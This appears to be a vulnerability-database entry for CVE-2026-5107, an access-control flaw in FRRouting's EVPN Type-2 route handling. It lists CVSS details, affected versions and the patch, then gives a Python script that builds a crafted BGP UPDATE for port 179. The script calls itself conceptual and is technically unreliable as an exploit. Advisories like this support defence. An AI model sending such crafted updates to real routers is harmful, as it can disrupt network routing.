Security Vulnerability Report
CVE-2026-5107 CVSS 4.2 MEDIUM

CVE-2026-5107

Published: 2026-03-30 06:16:06
Last Modified: 2026-04-29 22:01:48

Description

A vulnerability has been found in FRRouting FRR up to 10.5.1. This affects the function process_type2_route of the file bgpd/bgp_evpn.c of the component EVPN Type-2 Route Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitability is reported as difficult. The identifier of the patch is 7676cad65114aa23adde583d91d9d29e2debd045. To fix this issue, it is recommended to deploy a patch.

CVSS Details

CVSS Score: 4.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:frrouting:frrouting:10.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:frrouting:frrouting:10.5.1:*:*:*:*:*:*:* - VULNERABLE
FRRouting FRR <= 10.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-5107: FRRouting EVPN Type-2 Route Improper Access Control
# This script simulates sending a crafted BGP EVPN Type-2 route update.
# Note: Actual exploitation requires a BGP session and specific network conditions.
import socket
import struct


def build_bgp_open():
    # Simplified BGP OPEN message
    return b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x1d\x01\x04\x00\x64\x00\xb4\x0c\x00\x00\x00\x00'


def build_evpn_update():
    # Simplified BGP UPDATE with EVPN NLRI (Type-2)
    # This is a conceptual representation, not a fully compliant packet.
    marker = b'\xff' * 16
    length = struct.pack('!H', 50)  # Placeholder length
    type_ = b'\x02'  # UPDATE
    withdrawn_len = struct.pack('!H', 0)
    path_attr_len = struct.pack('!H', 0)  # Simplified
    # EVPN Type-2 NLRI (MAC/IP Advertisement Route)
    # Format: [Type(1)][Length(1)][Route Distinguisher(8)][ESI(10)][ETag(4)][MAC(6)][IP(4 or 16)]
    nlri = b'\x02\x19'  # Type 2, Length 25 (example)
    nlri += b'\x00' * 8  # RD (Route Distinguisher)
    nlri += b'\x00' * 10  # ESI (Ethernet Segment Identifier)
    nlri += b'\x00' * 4  # ETag
    nlri += b'\x00\x11\x22\x33\x44\x55'  # MAC Address
    nlri += b'\xc0\xa8\x01\x01'  # IP Address
    message = marker + length + type_ + withdrawn_len + path_attr_len + nlri
    # Update length
    length_corrected = struct.pack('!H', len(message))
    return marker + length_corrected + type_ + withdrawn_len + path_attr_len + nlri


# In a real scenario, connect to BGP port 179
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.connect(('target_ip', 179))
# sock.send(build_bgp_open())
# sock.send(build_evpn_update())
print("[+] Crafted EVPN Type-2 Update generated (Conceptual PoC)")
print("[+] Refer to patch 7676cad65114aa23adde583d91d9d29e2debd045 for details")

References

Raw JSON Data
